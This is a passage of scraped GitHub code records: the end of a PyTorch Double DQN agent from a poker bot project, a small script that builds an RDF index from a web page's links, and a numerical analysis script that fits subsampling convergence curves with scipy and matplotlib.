epsilon_decay_steps\n self.batch_size = batch_size\n self.action_num = action_num\n self.train_every = train_every\n\n # Torch device\n if device is None:\n self.device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n else:\n self.device = device\n\n # Total timesteps\n self.total_t = 0\n\n # Total training step\n self.train_t = 0\n\n # The epsilon decay scheduler\n self.epsilons = np.linspace(epsilon_start, epsilon_end, epsilon_decay_steps)\n\n # Create estimators\n self.q_estimator = Estimator(action_num=action_num, learning_rate=learning_rate, state_shape=state_shape, \\\n mlp_layers=mlp_layers, device=self.device)\n self.target_estimator = Estimator(action_num=action_num, learning_rate=learning_rate, state_shape=state_shape, \\\n mlp_layers=mlp_layers, device=self.device)\n\n # Create replay memory\n self.memory = Memory(replay_memory_size, batch_size)\n\n def feed(self, ts):\n ''' Store data in to replay buffer and train the agent. There are two stages.\n In stage 1, populate the memory without training\n In stage 2, train the agent every several timesteps\n\n Args:\n ts (list): a list of 5 elements that represent the transition\n '''\n (state, action, reward, next_state, done) = tuple(ts)\n self.feed_memory(state['obs'], action, reward, next_state['obs'], done)\n self.total_t += 1\n tmp = self.total_t - self.replay_memory_init_size\n if tmp>=0 and tmp%self.train_every == 0:\n self.train()\n\n def step(self, state):\n ''' Predict the action for genrating training data but\n have the predictions disconnected from the computation graph\n\n Args:\n state (numpy.array): current state\n\n Returns:\n action (int): an action id\n '''\n A = self.predict(state['obs'])\n A = remove_illegal(A, state['legal_actions'])\n action = np.random.choice(np.arange(len(A)), p=A)\n return action\n\n def eval_step(self, state):\n ''' Predict the action for evaluation purpose.\n\n Args:\n state (numpy.array): current state\n\n Returns:\n action (int): an action id\n '''\n q_values = self.q_estimator.predict_nograd(np.expand_dims(state['obs'], 0))[0]\n probs = remove_illegal(np.exp(q_values), state['legal_actions'])\n best_action = np.argmax(probs)\n return best_action, probs\n\n def predict(self, state):\n ''' Predict the action probabilities but have them\n disconnected from the computation graph\n\n Args:\n state (numpy.array): current state\n\n Returns:\n q_values (numpy.array): a 1-d array where each entry represents a Q value\n '''\n epsilon = self.epsilons[min(self.total_t, self.epsilon_decay_steps-1)]\n A = np.ones(self.action_num, dtype=float) * epsilon / self.action_num\n q_values = self.q_estimator.predict_nograd(np.expand_dims(state, 0))[0]\n best_action = np.argmax(q_values)\n A[best_action] += (1.0 - epsilon)\n return A\n\n def train(self):\n ''' Train the network\n\n Returns:\n loss (float): The loss of the current batch.\n '''\n state_batch, action_batch, reward_batch, next_state_batch, done_batch = self.memory.sample()\n\n # Calculate best next actions using Q-network (Double DQN)\n q_values_next = self.q_estimator.predict_nograd(next_state_batch)\n best_actions = np.argmax(q_values_next, axis=1)\n\n # Evaluate best next actions using Target-network (Double DQN)\n q_values_next_target = self.target_estimator.predict_nograd(next_state_batch)\n target_batch = reward_batch + np.invert(done_batch).astype(np.float32) * \\\n self.discount_factor * q_values_next_target[np.arange(self.batch_size), best_actions]\n\n # Perform gradient descent update\n state_batch = np.array(state_batch)\n\n loss = self.q_estimator.update(state_batch, action_batch, target_batch)\n print('\\rINFO - Agent {}, step {}, rl-loss: {}'.format(self.scope, self.total_t, loss), end='')\n\n # Update the target estimator\n if self.train_t % self.update_target_estimator_every == 0:\n self.target_estimator = deepcopy(self.q_estimator)\n print(\"\\nINFO - Copied model parameters to target network.\")\n\n self.train_t += 1\n\n def feed_memory(self, state, action, reward, next_state, done):\n ''' Feed transition to memory\n\n Args:\n state (numpy.array): the current state\n action (int): the performed action ID\n reward (float): the reward received\n next_state (numpy.array): the next state after performing the action\n done (boolean): whether the episode is finished\n '''\n self.memory.save(state, action, reward, next_state, done)\n\n def get_state_dict(self):\n ''' Get the state dict to save models\n\n Returns:\n (dict): A dict of model states\n '''\n q_key = self.scope + '_q_estimator'\n q_value = self.q_estimator.qnet.state_dict()\n target_key = self.scope + '_target_estimator'\n target_value = self.target_estimator.qnet.state_dict()\n return {q_key: q_value, target_key: target_value}\n\n def load(self, checkpoint):\n ''' Load model\n\n Args:\n checkpoint (dict): the loaded state\n '''\n # print(checkpoint.keys())\n q_key = self.scope + '_q_estimator'\n self.q_estimator.qnet.load_state_dict(checkpoint[q_key])\n target_key = self.scope + '_target_estimator'\n self.target_estimator.qnet.load_state_dict(checkpoint[target_key])\n\nclass Estimator(object):\n '''\n Approximate clone of rlcard.agents.dqn_agent.Estimator that\n uses PyTorch instead of Tensorflow. All methods input/output np.ndarray.\n\n Q-Value Estimator neural network.\n This network is used for both the Q-Network and the Target Network.\n '''\n\n def __init__(self, action_num=2, learning_rate=0.001, state_shape=None, mlp_layers=None, device=None):\n ''' Initilalize an Estimator object.\n\n Args:\n action_num (int): the number output actions\n state_shape (list): the shape of the state space\n mlp_layers (list): size of outputs of mlp layers\n device (torch.device): whether to use cpu or gpu\n '''\n self.action_num = action_num\n self.learning_rate=learning_rate\n self.state_shape = state_shape\n self.mlp_layers = mlp_layers\n self.device = device\n\n # set up Q model and place it in eval mode\n qnet = EstimatorNetwork(action_num, state_shape, mlp_layers)\n qnet = qnet.to(self.device)\n self.qnet = qnet\n self.qnet.eval()\n\n # initialize the weights using Xavier init\n # for p in self.qnet.parameters():\n # if len(p.data.shape) > 1:\n # nn.init.xavier_uniform_(p.data, gain=nn.init.calculate_gain('relu'))\n\n # set up loss function\n self.mse_loss = nn.MSELoss(reduction='mean')\n\n # set up optimizer\n self.optimizer = torch.optim.Adam(self.qnet.parameters(), lr=self.learning_rate)\n\n\n\n def predict_nograd(self, s):\n ''' Predicts action values, but prediction is not included\n in the computation graph. It is used to predict optimal next\n actions in the Double-DQN algorithm.\n\n Args:\n s (np.ndarray): (batch, state_len)\n\n Returns:\n np.ndarray of shape (batch_size, NUM_VALID_ACTIONS) containing the estimated\n action values.\n '''\n with torch.no_grad():\n s = torch.from_numpy(s).float().to(self.device)\n q_as = self.qnet(s).cpu().numpy()\n return q_as\n\n\n\n \n\n def update(self, s, a, y):\n ''' Updates the estimator towards the given targets.\n In this case y is the target-network estimated\n value of the Q-network optimal actions, which\n is labeled y in Algorithm 1 of Minh et al. (2015)\n\n Args:\n s (np.ndarray): (batch, state_shape) state representation\n a (np.ndarray): (batch,) integer sampled actions\n y (np.ndarray): (batch,) value of optimal actions according to Q-target\n\n Returns:\n The calculated loss on the batch.\n '''\n self.optimizer.zero_grad()\n\n self.qnet.train()\n\n s = torch.from_numpy(s).float().to(self.device)\n a = torch.from_numpy(a).long().to(self.device)\n y = torch.from_numpy(y).float().to(self.device)\n\n # (batch, state_shape) -> (batch, action_num)\n q_as = self.qnet(s)\n\n # (batch, action_num) -> (batch, )\n Q = torch.gather(q_as, dim=-1, index=a.unsqueeze(-1)).squeeze(-1)\n\n # update model\n batch_loss = self.mse_loss(Q, y)\n batch_loss.backward()\n self.optimizer.step()\n batch_loss = batch_loss.item()\n\n self.qnet.eval()\n\n return batch_loss\n\n\nclass EstimatorNetwork(nn.Module):\n ''' The function approximation network for Estimator\n It is just a series of tanh layers. All in/out are torch.tensor\n '''\n\n\n def __init__(self, action_num=2, state_shape=None, mlp_layers=None):\n ''' Initialize the Q network\n\n Args:\n action_num (int): number of legal actions\n state_shape (list): shape of state tensor\n mlp_layers (list): output size of each fc layer\n '''\n super(EstimatorNetwork, self).__init__()\n\n self.action_num = action_num\n self.state_shape = state_shape\n self.mlp_layers = mlp_layers\n\n # build the Q network\n layer_dims = [np.prod(self.state_shape)] + self.mlp_layers\n fc = [nn.Flatten()]\n fc.append(nn.BatchNorm1d(layer_dims[0]))\n for i in range(len(layer_dims)-1):\n fc.append(nn.Linear(layer_dims[i], layer_dims[i+1], bias=True))\n fc.append(nn.Tanh())\n fc.append(nn.Linear(layer_dims[-1], self.action_num, bias=True))\n # print(fc)\n self.fc_layers = nn.Sequential(*fc)\n self.weights_init_uniform(self.fc_layers)\n\n def weights_init_uniform(self, m):\n classname = m.__class__.__name__\n # for every Linear layer in a model..\n if classname.find('Linear') != -1:\n # apply a uniform distribution to the weights and a bias=0\n print('sup')\n m.weight.data.uniform_(0.0, 1.0)\n m.bias.data.fill_(0)\n\n def forward(self, s):\n ''' Predict action values\n\n Args:\n s (Tensor): (batch, state_shape)\n '''\n return self.fc_layers(s)\n\n\n\nclass Memory(object):\n ''' Memory for saving transitions\n '''\n\n def __init__(self, memory_size, batch_size):\n ''' Initialize\n Args:\n memory_size (int): the size of the memroy buffer\n '''\n self.memory_size = memory_size\n self.batch_size = batch_size\n self.memory = []\n\n def save(self, state, action, reward, next_state, done):\n ''' Save transition into memory\n\n Args:\n state (numpy.array): the current state\n action (int): the performed action ID\n reward (float): the reward received\n next_state (numpy.array): the next state after performing the action\n done (boolean): whether the episode is finished\n '''\n if len(self.memory) == self.memory_size:\n self.memory.pop(0)\n transition = Transition(state, action, reward, next_state, done)\n self.memory.append(transition)\n\n def sample(self):\n ''' Sample a minibatch from the replay memory\n\n Returns:\n state_batch (list): a batch of states\n action_batch (list): a batch of actions\n reward_batch (list): a batch of rewards\n next_state_batch (list): a batch of states\n done_batch (list): a batch of dones\n '''\n samples = random.sample(self.memory, self.batch_size)\n return map(np.array, zip(*samples))","repo_name":"PhDChe/Poker-1","sub_path":"ignitionBot/ivan/rlcard/rlcard/agents/dqn_agent_pytorch.py","file_name":"dqn_agent_pytorch.py","file_ext":"py","file_size_in_byte":15148,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"69"}
+{"seq_id":"8548819153","text":"import urllib\nimport sys\nfrom BeautifulSoup import BeautifulSoup\n\nurl = 'http://moustaki.org/rdf/popsongs/'\n\nf = urllib.urlopen(url)\nhtml = f.read()\nf.close()\nsoup = BeautifulSoup(html)\n\no = open('index.ttl','w')\no.write('@prefix rdfs: .\\n\\n')\n\nfor link in soup('a') :\n\to.write('<> rdfs:seeAlso <')\n\to.write(url)\n\to.write(link.attrs[0][1])\n\to.write('>.\\n')\n\no.close()\n\n","repo_name":"moustaki/motools","sub_path":"dbtune/pop-songs/Index.py","file_name":"Index.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"69"}
+{"seq_id":"8572875764","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom scipy.ndimage import uniform_filter1d\nfrom scipy.optimize import curve_fit\nfrom scipy.stats import ks_2samp\nfrom sklearn.metrics import r2_score\n\nfrom pyplm.utilities.tools import p1, p2, p3, p_power, sqrt_x\nfrom pyplm.plotting import mkfigure\n\nplt.style.use('/Users/mk14423/Dropbox/mpl-styles/thesisbody.mplstyle')\nCATCOLS = plt.rcParams['axes.prop_cycle'].by_key()['color']\n\ndef get_subsampling_data_frame(file, group, T_true):\n df = pd.read_hdf(file, group + '/subsampling')\n df['mean_J'] = df['mean_J'] * df['N'] # rescale by N\n df['std_J'] = df['std_J'] * (df['N'] ** 0.5)\n df['mu'] = df['mean_J'] / df['std_J']\n df['T'] = 1 / df['std_J']\n # NORMALIZING T\n df['T'] = df['T'] / T_true\n df = df.sort_values(by=['B', 'iD'])\n return df\n\n\ndef convergence_check(x, y, nWindow):\n # print(x.shape)\n # print(y.shape)\n series_graidents = np.zeros((4, x.size))\n # print(series_graidents)\n series_graidents[0, :] = x\n series_graidents[1, :] = y\n # print(x.shape, np.diff(x).shape, y.shape)\n # exit()\n # print(x)\n # I think this makes more sense..?\n # print(x)\n # print(np.diff(x))\n \n dx = np.diff(x)\n dx = np.hstack((dx, dx[-1]))\n \n # dy = np.diff(y)\n # dy = np.hstack((dy, dy[-1]))\n # dxdy = dy/dx\n # dx2dy2 = dxdy / dx\n dydx = np.gradient(y, x) # / dx\n # dydx = uniform_filter1d(dydx, nWindow, mode='reflect')\n d2yd2x = np.gradient(dydx, x) # / dx\n # d2yd2x = uniform_filter1d(d2yd2x, 10, mode='reflect')\n # dydx = np.gradient(y) / dx\n # d2yd2x = np.gradient(dydx) # / dx\n series_graidents[2, :] = dydx\n series_graidents[3, :] = d2yd2x\n # series_graidents = series_graidents[:, nWindow: -nWindow]\n return series_graidents\n\n\ndef convergence_check2(x, y, polyorder):\n xfit = np.linspace(x.min(), x.max(), 5000)\n if polyorder == 1:\n popt, _ = curve_fit(p1, x, y)\n yfit = p1(xfit, *popt)\n elif polyorder == 2:\n popt_linear, _ = curve_fit(p1, x, y)\n linear_r2 = r2_score(y, p1(x, *popt_linear))\n popt, _ = curve_fit(p2, x, y)\n quadratic_r2 = r2_score(y, p2(x, *popt))\n # this is a silly quantity.\n print((quadratic_r2 - linear_r2) / quadratic_r2)\n yfit = p2(xfit, *popt)\n elif polyorder == 3:\n popt, _ = curve_fit(p3, x, y)\n yfit = p3(xfit, *popt)\n # print(popt)\n\n\n # polyfit = np.polynomial.Polynomial.fit(x, y, polyorder)\n # print(polyfit.coef)\n series_graidents = np.zeros((4, xfit.size))\n\n dydx = np.gradient(yfit, xfit)\n # dydx = dydx / b1\n # dydx = uniform_filter1d(dydx, 10, mode='reflect')\n d2yd2x = np.gradient(dydx, xfit) # / dx\n # this is too much....\n # d2yd2x = d2yd2x / (b1)\n # print(d2yd2x)\n # this seems wrong, surely these should go to 0..?\n series_graidents[0, :] = xfit\n series_graidents[1, :] = yfit\n series_graidents[2, :] = dydx\n series_graidents[3, :] = d2yd2x\n return series_graidents, popt\n\ndef graidents():\n plt.style.use('/Users/mk14423/Dropbox/mpl-styles/thesisbody.mplstyle')\n file = '/Users/mk14423/Desktop/Data/0_thesis/SubSampleSK/datasets.hdf5'\n groups = ['N50', 'N100', 'N200', 'N400', 'N800']\n g_labels = ['N = 50', 'N = 100', 'N = 200', 'N = 400', 'N = 800']\n emin = np.array([0.14320461, 0.20949111, 0.29832886, 0.44711299, 0.69887905])\n Btilde_linextrap = np.array([0.50661207, 0.74111249, 1.055392, 1.58174263, 2.47241035])\n T_trues = [1.1, 1.175, 1.1, 1.1, 1.25]\n Ns = np.array([50, 100, 200, 400, 800])\n # Btilde_linextrap *= 1e3\n # group = 'N800'\n # save = False\n figw, figh = plt.rcParams.get('figure.figsize')\n # print(figw, figh)\n fig, ax = mkfigure(nrows=1, ncols=1, sharex=True, figsize=(figw, figh * 1))\n # iG = 4\n # it works better in B than 1/B, whcich is annoying...\n iGs = [0, 1, 2, 3, 4]\n # iGs = [4]\n for iG in iGs:\n # print(iG)\n df = get_subsampling_data_frame(file, groups[iG], T_trues[iG])\n # print(df)\n # df['std_J'] = df['std_J'] * T_trues[iG]\n rescale = 1\n df['B'] = df['B'] * rescale\n df = df[df['B'] > 3e3 * rescale]\n df = df.groupby(['B'], as_index=True).mean()\n df = df.reset_index()\n nWindow = 10\n \n # df['std_J'] = uniform_filter1d(df['std_J'], nWindow, mode='reflect')\n xs = np.flip(1 / df['B'].to_numpy())\n ys = np.flip(df['std_J'].to_numpy()) # .to_numpy()\n\n # -- trying to \"standardize\" the variables -- #\n # ys = (ys - np.mean(ys))/np.std(ys)\n\n\n # what if I rescale to begin with.... here; report everything in units of b1!?\n # -- -- #\n # cuttoff = 1/(8e3 * rescale)\n # hmmm but why....\n # cuttoff = 1/(8e3 * rescale)\n # cut_poly = np.polynomial.Polynomial.fit(\n # xs[xs < cuttoff],\n # ys[xs < cuttoff],\n # 1)\n # b0, b1 = cut_poly.coef\n # print(cuttoff, b0, b1)\n # popt, _ = curve_fit(p1, xs[xs < cuttoff], ys[xs < cuttoff])\n # b0, b1 = popt\n # print(cuttoff, b0, b1)\n # let's see if the same thing happens with scipy.optimize?\n # ys = (ys - b0)\n # ys = ys / b1\n # -- -- #\n # s_gs = convergence_check(xs, ys)\n # idk if I can trust polyfit anymore now that I've seen this bullshit!\n s_gs, popt = convergence_check2(xs, ys, 2)\n # s_gs[1, :] = s_gs[1, :] / popt[1]\n # s_gs[2, :] = s_gs[2, :] / popt[1]\n s_gs[3, :] = s_gs[3, :] / (popt[1] ** 2)\n cols = plt.rcParams['axes.prop_cycle'].by_key()['color']\n ax[0, 0].plot(s_gs[0, :], s_gs[1, :], marker=',', c=cols[iG])\n # ax[1, 0].plot(s_gs[0, :], s_gs[2, :], marker=',', c=cols[iG])\n # ax[2, 0].plot(s_gs[0, :], s_gs[3, :], marker=',', c=cols[iG])\n\n # print(' ------ ')\n # print(np.abs(popt / popt[1]))\n # print(popt)\n # print(iG, np.abs((popt[1] ** 2) / popt[2]))\n # print(popt[1]/ b1, popt[2]/ b1)\n # print(' ------ ')\n s_gs = convergence_check(xs, ys, nWindow)\n # s_gs[1, :] = s_gs[1, :]\n # s_gs[2, :] = s_gs[2, :] / popt[1]\n line, = ax[0, 0].plot(s_gs[0, :], s_gs[1, :], label=f'N={Ns[iG]}', marker='o', ls='none')\n # ax[1, 0].plot(s_gs[0, :], s_gs[2, :], label=f'N={Ns[iG]}', c=line.get_color(), marker='o', ls='none')\n # ax[2, 0].plot(s_gs[0, :], s_gs[3, :], label=f'N={Ns[iG]}', c=line.get_color(), marker='o', ls='none')\n\n legend = ax[0, 0].legend(loc='upper left', fontsize='8')\n legend.get_frame().set_alpha(None)\n\n ax[0, 0].set(ylabel=r'$y^{*} = \\sigma^{*} N^{1/2}$', xlabel=r'$B^{-1}$')\n # ax[1, 0].set(ylabel=r'$\\partial y / \\left( \\partial B^{-1} \\right)$') # [ \\times 10^{4}]\n # ax[2, 0].set(ylabel=r'$\\partial ^2 y / \\left( \\partial ^2 B^{-1} \\right)$', xlabel=r'$B^{-1}$')\n\n # ax[1, 0].set(ylim=[0.5, 1.5])\n ax[0, 0].set(\n xlim=[xs.min(), xs.max()],\n # ylim=[-10, 10]\n )\n\n # ax[1, 0].ticklabel_format(axis='y', style='sci', scilimits=(0,0))\n ax[0, 0].xaxis.set_major_locator(plt.MaxNLocator(5))\n\n # ax[0, 0].axvline(1/(8e3 * rescale), marker=',', ls='--', c='k')\n # ax[1, 0].axvline(1/(8e3 * rescale), marker=',', ls='--', c='k')\n # ax[2, 0].axvline(1/(8e3 * rescale), marker=',', ls='--', c='k')\n\n # ylabel=r'$\\partial \\sigma ^{*} / \\partial (1/B)$')\n # ax[0, 1].set(ylim=[-0.05, 0])\n # ax[1, 0].set(ylim=[-0.005, 0.005])\n plt.show()\n\n# this will all get renamed and everything.\n\ndef sliding_coalesc(x, y, ax, colour, method=False):\n nWindows = 10\n x_new, samples_new = make_windows(x, y, nWindows, ax=ax, method=method)\n CL = 0.05\n xs = []\n samples_again = []\n # print(x_new.shape)\n # compare first two, then add them together and compare the next one!\n accepted_sample = samples_new[0, :]\n # print(accepted_sample.shape)\n # print(accepted_sample)\n running_xs = [] # x_new[0]\n running_means = []\n running_stds = []\n accepted_indicies = [0]\n\n for i in range(1, x_new.size):\n # print(accepted_sample.shape)\n _, pvalue = ks_2samp(accepted_sample, samples_new[i], alternative='two-sided')\n # _, pvalue = ks_2samp(accepted_sample, samples_new[i], alternative='greater')\n # print(f'i={i}, p={pvalue:.3f} -> {pvalue >= CL}')\n if pvalue >= CL:\n # print(f'Accept')\n accepted_sample = np.hstack((accepted_sample, samples_new[i]))\n accepted_indicies.append(i)\n running_x = (x_new[0] + x_new[i]) / 2\n # accepted_xs = [x_new[ix] for ix in accepted_indicies]\n # print(accepted_indicies, accepted_xs)\n # running_x = np.sum(accepted_xs) / len(accepted_indicies)\n running_xs.append(running_x)\n running_means.append(np.mean(accepted_sample))\n running_stds.append(np.std(accepted_sample, ddof=1))\n else:\n # print('REJECTED!')\n break\n i_cuttoff = accepted_sample.size - 1\n\n x_cuttoff = x[i_cuttoff]\n # print(i_cuttoff, x_cuttoff)\n if method == True:\n # ax.errorbar(\n # x=x_new,\n # y=np.mean(samples_new, axis=1),\n # marker='o',\n # ls='none',\n # yerr=np.std(samples_new,axis=1),\n # c='k')\n ax.axvline(x_cuttoff, c='k', marker=',', ls='--')\n ax.errorbar(\n x=running_xs[-1],\n y=running_means[-1],\n yerr=running_stds[-1],\n c='k', marker='^',\n markersize=5,\n elinewidth=2,\n zorder=100\n )\n return x_cuttoff\n\n\ndef make_windows(x, y, nWindows, ax, method):\n x_new = []\n window_length = int(y.size / nWindows)\n # print(nWindows, window_length)\n # window_length = 10\n # nWindows = int(dydx.size / window_length)\n samples = []\n for i in range(0, nWindows):\n w_start = i * window_length\n w_end = (i + 1) * window_length\n w_middle = int((w_start + w_end) / 2)\n data = y[w_start:w_end]\n # print(mean, std)\n x_new.append(x[w_middle])\n samples.append(data)\n if method == True:\n line, = ax.plot(x[w_start:w_end], data, ls='none')\n c = line.get_color()\n ax.axvspan(x[w_start], x[w_end-1], fc=c, alpha=0.5)\n # samples = np.array(samples)\n return np.array(x_new), np.array(samples)\n\ndef coalescing_example():\n plt.style.use('/Users/mk14423/Dropbox/mpl-styles/thesisbody.mplstyle')\n file = '/Users/mk14423/Desktop/Data/0_thesis/SubSampleSK/datasets.hdf5'\n groups = ['N50', 'N100', 'N200', 'N400', 'N800']\n g_labels = ['N=50', 'N=100', 'N=200', 'N=400', 'N=800']\n T_trues = [1.1, 1.175, 1.1, 1.1, 1.25]\n figw, figh = plt.rcParams.get('figure.figsize')\n # fig, ax = mkfigure(\n # nrows=2, ncols=2,\n # sharex=True,\n # # figsize=(figw, figh * 1.4)\n # )\n fig, ax = mkfigure(\n nrows=1, ncols=1,\n # sharex=True,\n # figsize=(figw, figh * 1.4)\n )\n ax = ax.ravel()\n # iG = 4\n iGs = [0, 1, 2, 3, 4]\n cuts = []\n # iGs = [3]\n iP = 0\n for iG in iGs:\n # print(iG)\n df = get_subsampling_data_frame(file, groups[iG], T_trues[iG])\n # print(df)\n df['std_J'] = df['std_J'] * T_trues[iG]\n rescale = 1\n df['B'] = df['B'] * rescale\n df = df[df['B'] > 3e3 * rescale]\n df = df.groupby(['B'], as_index=True).mean()\n df = df.reset_index()\n\n # df['std_J'] = uniform_filter1d(df['std_J'], nWindow, mode='reflect')\n xs = np.flip(1 / df['B'].to_numpy())\n ys = np.flip(df['std_J'].to_numpy()) # .to_numpy()\n # ax[0, 0].plot(xs, ys)\n dydx = np.gradient(ys, xs)\n x_cut = sliding_coalesc(xs, dydx, ax[iP], CATCOLS[iG])\n ax[0].plot(\n xs[xs <= x_cut], ys[xs <= x_cut],\n alpha=1, ls='none', c=CATCOLS[iG], marker='o', zorder=50,\n label=g_labels[iG])\n ax[0].plot(\n xs[xs > x_cut], ys[xs > x_cut],\n alpha=0.25, ls='none', c=CATCOLS[iG], marker='o', zorder=50)\n\n xfit = np.linspace(0, xs.max(), 1000)\n popt, _ = curve_fit(p1, xs[xs <= x_cut], ys[xs <= x_cut])\n yfit = p1(xfit, *popt)\n ax[0].plot(xfit, yfit, c='k', marker=',', zorder=1)\n\n # print(T_trues[iG], 1 / popt[0], 1 / np.mean(ys[xs <= x_cut]))\n # print(popt[1]) # np.mean(dydx[xs <= x_cut])\n print(x_cut, popt)\n # ax[iP].plot(\n # xs[xs <= x_cut], dydx[xs <= x_cut], alpha=1, ls='none', c=CATCOLS[iG], marker='o', label=g_labels[iG])\n # ax[iP].plot(\n # xs[xs > x_cut], dydx[xs > x_cut], alpha=0.25, ls='none', c=CATCOLS[iG], marker='o')\n # cuts.append(x_cut)\n # ax[iP].set(\n # xlim=[xs.min(), xs.max()],\n # # ylabel=r'$\\partial y / \\partial \\left( B^{-1} \\right)$'\n # )\n # ax[iP].yaxis.set_major_locator(plt.MaxNLocator(3))\n # ax[iP].legend(loc='lower right', fontsize=9)\n # ax[iP].ticklabel_format(axis='y', style='sci', scilimits=(0,0))\n # iP += 1\n\n # ax[0, 0].set(ylabel=r'$y = \\sigma^{*} N^{1/2}$')\n # ax[1, 0].set(ylabel=r'$\\partial y / \\partial \\left( B^{-1} \\right)$', xlabel=r'$B^{-1}$')\n # # ax[2, 0].set(ylabel=r'$\\partial ^2 y / \\partial ^2 B^{-1}$', )\n # ax[1, 0]\n # ax[1, 0].ticklabel_format(axis='y', style='sci', scilimits=(0,0))\n\n ax[0].legend()\n ax[0].set(\n xlabel=r'$B^{-1}$',\n ylabel=r'$\\sigma^{*} / \\sigma^{0}$',\n xlim=[xs.min(), xs.max()],\n # xlim=[xfit.min(), xfit.max()],\n ylim=[None, 2]\n )\n ax[0].xaxis.set_major_locator(plt.MaxNLocator(4))\n # fig.supylabel(r'$\\partial y / \\partial \\left( B^{-1} \\right)$')\n # fig.supxlabel(r'$B^{-1}$')\n plt.show()\n\n\ndef coalescing_method():\n plt.style.use('/Users/mk14423/Dropbox/mpl-styles/thesisbody.mplstyle')\n file = '/Users/mk14423/Desktop/Data/0_thesis/SubSampleSK/datasets.hdf5'\n groups = ['N50', 'N100', 'N200', 'N400', 'N800']\n g_labels = ['N=50', 'N=100', 'N=200', 'N=400', 'N=800']\n T_trues = [1.1, 1.175, 1.1, 1.1, 1.25]\n figw, figh = plt.rcParams.get('figure.figsize')\n # fig, ax = mkfigure(\n # nrows=2, ncols=2,\n # sharex=True,\n # # figsize=(figw, figh * 1.4)\n # )\n fig, ax = mkfigure(\n nrows=2, ncols=1,\n sharex=True,\n # figsize=(figw, figh * 1.4)\n )\n ax = ax.ravel()\n # iG = 4\n iGs = [0, 1, 2, 3, 4]\n cuts = []\n iGs = [2,3]\n iP = 0\n for iG in iGs:\n # print(iG)\n df = get_subsampling_data_frame(file, groups[iG], T_trues[iG])\n # print(df)\n df['std_J'] = df['std_J'] * T_trues[iG]\n rescale = 1\n df['B'] = df['B'] * rescale\n df = df[df['B'] > 3e3 * rescale]\n df = df.groupby(['B'], as_index=True).mean()\n df = df.reset_index()\n\n # df['std_J'] = uniform_filter1d(df['std_J'], nWindow, mode='reflect')\n xs = np.flip(1 / df['B'].to_numpy())\n ys = np.flip(df['std_J'].to_numpy()) # .to_numpy()\n # ax[0, 0].plot(xs, ys)\n dydx = np.gradient(ys, xs)\n x_cut = sliding_coalesc(xs, dydx, ax[iP], CATCOLS[iG], method=True)\n ax[iP].set(\n ylabel=r'$\\partial y / \\partial \\left( B^{-1} \\right)$',\n xlim=[xs.min(), xs.max()],\n # ylim=[None, 2]\n )\n ax[iP].ticklabel_format(axis='y', style='sci', scilimits=(0,0))\n ax[iP].xaxis.set_major_locator(plt.MaxNLocator(4))\n iP += 1\n ax[-1].set(xlabel=r'$B^{-1}$')\n plt.show()\n\ndef b1_Btilde_N_helper(Ns, bias_measure, fitfunc, ax, fitls='-', **pltargs):\n line, = ax.plot(\n Ns, bias_measure,\n **pltargs)\n popt, _ = curve_fit(fitfunc, Ns, bias_measure)\n r2 = r2_score(bias_measure, fitfunc(Ns, *popt))\n print(popt, r2)\n xs = np.linspace(Ns.min(), Ns.max(), 1000)\n ax.plot(xs, fitfunc(xs, *popt), ls=fitls, marker=',', c=line.get_color())\n return popt, r2\n\ndef b1_Btilde_N():\n # this is normalised data!\n Btilde_results_5e3 = np.array(\n [\n [1.00600985e+00, 2.72014640e+02, 9.88233835e-01],\n [9.94183234e-01, 5.19063249e+02, 9.61574352e-01],\n [1.00267001e+00, 1.02930216e+03, 9.37379556e-01],\n [9.97783478e-01, 2.04440470e+03, 8.69604374e-01],\n [1.02747743e+00, 4.28098167e+03, 7.60336351e-01],\n ]\n )\n Btilde_results_8e3 = np.array(\n [\n [1.00335165e+00, 2.36632494e+02, 9.88233835e-01],\n [9.98044149e-01, 5.73135231e+02, 9.61574352e-01],\n [9.99475985e-01, 9.85167260e+02, 9.37379556e-01],\n [9.98207849e-01, 2.05093924e+03, 8.69604374e-01],\n [1.00340312e+00, 3.99806103e+03, 7.60336351e-01],\n ]\n )\n # Btildes = Btilde_results_8e3[:, 1]\n b1s = np.array([184.914, 377.723, 816.309, 1786.117, 4059.442])\n Bts = Btilde_results_5e3[:, 1]\n emin = np.array([0.14320461, 0.20949111, 0.29832886, 0.44711299, 0.69887905])\n Ns = np.array([50, 100, 200, 400, 800])\n fig, ax = mkfigure(nrows=1, ncols=1)\n # whoops, had this the wrong way round, but whatever..\n print('---------')\n func = p1\n _, r2_p1Bt = b1_Btilde_N_helper(\n Ns, Bts, func, ax[0, 0],\n c=CATCOLS[0], ls='none', label=r'$\\tilde{B}$ fitting cut-off: $B = 5 \\times 10^3$'\n )\n _, r2_p1b1 = b1_Btilde_N_helper(\n Ns, b1s, func, ax[0, 0],\n c=CATCOLS[1], ls='none', label=r'$b_1$ variable fitting cut-off'\n )\n print(r2_p1b1, r2_p1Bt)\n func = p_power\n _, r2_ppBt = b1_Btilde_N_helper(\n Ns, Bts, func, ax[0, 0], fitls='--',\n c=CATCOLS[0], ls='none'\n # , label=r'$\\tilde{B}$ fitting cut-off: $B = 5 \\times 10^3$'\n )\n _, r2_ppb1 = b1_Btilde_N_helper(\n Ns, b1s, func, ax[0, 0], fitls='--',\n c=CATCOLS[1], ls='none'\n # , label=r'$b_1$ variable fitting cut-off'\n )\n print(r2_ppb1, r2_ppBt)\n # improvements\n imp_b1 = (r2_ppb1 - r2_p1b1) / r2_ppb1\n imp_Bt = (r2_ppBt - r2_p1Bt) / r2_ppBt\n print(imp_b1, imp_Bt)\n print('---------')\n\n ax[0, 0].set(xlabel=r'$N$', ylabel='Bias measure')\n ax[0, 0].legend()\n\n axin = ax[0,0].inset_axes([0.6, 0.15, 0.3, 0.3])\n func = sqrt_x\n _, r2_emin = b1_Btilde_N_helper(\n Ns, emin, func, axin, fitls='--',\n c=CATCOLS[0], ls='none'\n # , label=r'$\\tilde{B}$ fitting cut-off: $B = 5 \\times 10^3$'\n )\n axin.set(xlabel=r'$N$', ylabel=r'$\\varepsilon _{min}$')\n\n plt.show()\n\ndef b1_vs_emin_N():\n b1s = np.array([184.914, 377.723, 816.309, 1786.117, 4059.442])\n emins = np.array([0.14320461, 0.20949111, 0.29832886, 0.44711299, 0.69887905])\n Ns = np.array([50, 100, 200, 400, 800])\n 